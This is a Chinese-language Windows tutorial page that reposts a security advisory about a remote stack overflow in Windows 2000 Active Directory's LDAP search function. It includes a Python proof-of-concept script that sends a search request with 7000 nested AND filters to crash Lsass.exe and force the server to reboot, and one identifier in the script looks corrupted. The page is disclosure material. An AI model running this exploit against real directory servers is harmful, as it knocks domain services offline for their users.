Windows XP Windows 7 Windows 2003 Windows Vista Windows教程綜合 Linux 系統教程
Windows 10 Windows 8 Windows 2008 Windows NT Windows Server 電腦軟件教程
 Windows教程網 >> Windows Server系統教程 >> Windows Server教程 >> Microsoft Windows 活動目錄遠程堆棧溢出缺陷

Microsoft Windows 活動目錄遠程堆棧溢出缺陷

日期:2017/1/24 11:02:26      編輯:Windows Server教程


涉及程序:
Win2k Active Directory

描述:
Microsoft Windows 活動目錄遠程堆棧溢出缺陷

詳細:
Windows Active Directory(活動目錄)是Windows 2000結構的重要組件,是Microsoft提供的強大的目錄服務系統。

Windows活動目錄的LDAP 3搜索請求功能對用戶提交請求缺少正確緩沖區邊界檢查,遠程攻擊者可利用此缺陷使Lsass.exe服務崩潰,觸發緩沖區溢出。

通過活動目錄提供的目錄服務基於LDAP協議和並使用協議存儲和獲得Active目錄對象。活動目錄中使用LDAP 3的'search request'請求功能存在問題,攻擊者如果構建超過1000個"AND"的請求,並發送給服務器,可導致觸發堆棧溢出,使Lsass.exe服務崩潰,系統會在30秒內重新啟動。



攻擊方法:
CORE Security Technologies Advisories ([email protected])提供了如下測試方法:

下面是一段Python測試腳本:

------------------------------------
class ActiveDirectoryDOS( Ldap ):

def __init__(self):
self._s = None
self.host = '192.168.0.1'
self.basedn = 'dc=bugweek,dc=corelabs,dc=core-sdi,dc=com'
self.port = 389
self.buffer = ''
self.msg_id = 1
Ldap.__init__()

def generateFilter_BinaryOp( self, filter ):
filterBuffer = asn1.OCTETSTRING(filter[1]).encode() + asn1.OCTETSTRING(filter[2]).encode()
filterBuffer = self.encapsulateHeader( filter[0], filterBuffer )
return filterBuffer

def generateFilter_RecursiveBinaryOp( self, filter, numTimes):
simpleBinOp = self.generateFilter_BinaryOp( filter )
filterBuffer = simpleBinOp
for cnt in range( 0, numTimes ):
filterBuffer = self.encapsulateHeader( self.LDAP_FILTER_AND, filterBuffer + simpleBinOp )
return filterBuffer

 

def searchSub( self, filterBuffer ):

self.bindRequest()
self.searchRequest( filterBuffer )

def run(self, host = '', basedn = '', name = '' ):

# the machine must not exist
machine_name = 'xaxax'

filterComputerNotInDir = (Ldap.LDAP_FILTER_EQUAL99vY,'name',machine_name)

# execute the anonymous query
print 'executing query'
filterBuffer = self.generateFilter_RecursiveBinaryOp( filterComputerNotInDir, 7000 )
self.searchSub( filterBuffer )

 
Copyright © Windows教程網 All Rights Reserved